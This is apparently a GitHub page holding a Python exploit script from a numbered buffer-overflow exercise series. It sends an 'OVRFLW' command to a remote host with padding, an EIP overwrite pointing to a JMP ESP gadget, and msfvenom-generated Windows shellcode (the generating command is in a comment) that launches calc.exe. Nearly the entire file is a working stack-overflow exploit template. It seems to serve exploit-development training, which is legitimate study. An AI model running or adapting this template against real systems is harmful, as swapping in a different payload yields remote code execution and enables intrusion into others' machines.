-
Notifications
You must be signed in to change notification settings - Fork 30
/
6_pop_calc.py
executable file
·46 lines (39 loc) · 2.24 KB
/
6_pop_calc.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
#!/usr/bin/env python3
import socket
import struct
from PARAMETERS import RHOST, RPORT, buf_totlen, offset_eip, offset_esp, badchar_sequence, ptr_jmp_esp, sub_esp_10
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((RHOST, RPORT))
# msfvenom -p windows/exec -b '\x00\x04\x05\xA2\xA3\xAC\xAD\xC0\xC1\xEF\xF0' -f python --var-name shellcode_calc CMD=calc.exe EXITFUNC=thread
shellcode_calc = b""
shellcode_calc += b"\x6a\x31\x59\xd9\xee\xd9\x74\x24\xf4\x5b"
shellcode_calc += b"\x81\x73\x13\x08\x83\xd2\x07\x83\xeb\xfc"
shellcode_calc += b"\xe2\xf4\xf4\x6b\x50\x07\x08\x83\xb2\x8e"
shellcode_calc += b"\xed\xb2\x12\x63\x83\xd3\xe2\x8c\x5a\x8f"
shellcode_calc += b"\x59\x55\x1c\x08\xa0\x2f\x07\x34\x98\x21"
shellcode_calc += b"\x39\x7c\x7e\x3b\x69\xff\xd0\x2b\x28\x42"
shellcode_calc += b"\x1d\x0a\x09\x44\x30\xf5\x5a\xd4\x59\x55"
shellcode_calc += b"\x18\x08\x98\x3b\x83\xcf\xc3\x7f\xeb\xcb"
shellcode_calc += b"\xd3\xd6\x59\x08\x8b\x27\x09\x50\x59\x4e"
shellcode_calc += b"\x10\x60\xe8\x4e\x83\xb7\x59\x06\xde\xb2"
shellcode_calc += b"\x2d\xab\xc9\x4c\xdf\x06\xcf\xbb\x32\x72"
shellcode_calc += b"\xfe\x80\xaf\xff\x33\xfe\xf6\x72\xec\xdb"
shellcode_calc += b"\x59\x5f\x2c\x82\x01\x61\x83\x8f\x99\x8c"
shellcode_calc += b"\x50\x9f\xd3\xd4\x83\x87\x59\x06\xd8\x0a"
shellcode_calc += b"\x96\x23\x2c\xd8\x89\x66\x51\xd9\x83\xf8"
shellcode_calc += b"\xe8\xdc\x8d\x5d\x83\x91\x39\x8a\x55\xe9"
shellcode_calc += b"\xd3\x8a\x8d\x31\xd2\x07\x08\xd3\xba\x36"
shellcode_calc += b"\x83\xec\x55\xf8\xdd\x38\x32\x1a\x22\x89"
shellcode_calc += b"\xba\xa1\x9d\x3e\x4f\xf8\xdd\xbf\xd4\x7b"
shellcode_calc += b"\x02\x03\x29\xe7\x7d\x86\x69\x40\x1b\xf1"
shellcode_calc += b"\xbd\x6d\x08\xd0\x2d\xd2\x6b\xe2\xbe\x64"
shellcode_calc += b"\x26\xe6\xaa\x62\x08\x83\xd2\x07"
buf = b""
buf += b"A"*(offset_eip - len(buf)) # padding
buf += struct.pack("<I", ptr_jmp_esp) # EIP overwrite with "JMP ESP"
buf += b"\x90"*(offset_esp - offset_eip - 4) # Padding between EIP and ESP
buf += sub_esp_10 # ESP overwrite (we move it to avoid any overwrite - nopsled alternative)
buf += shellcode_calc # The SHELLCODE
buf += b"D"*(buf_totlen - len(buf)) # Trailing Padding
buf += b"\n"
s.send(b"OVRFLW " + buf + b"\n")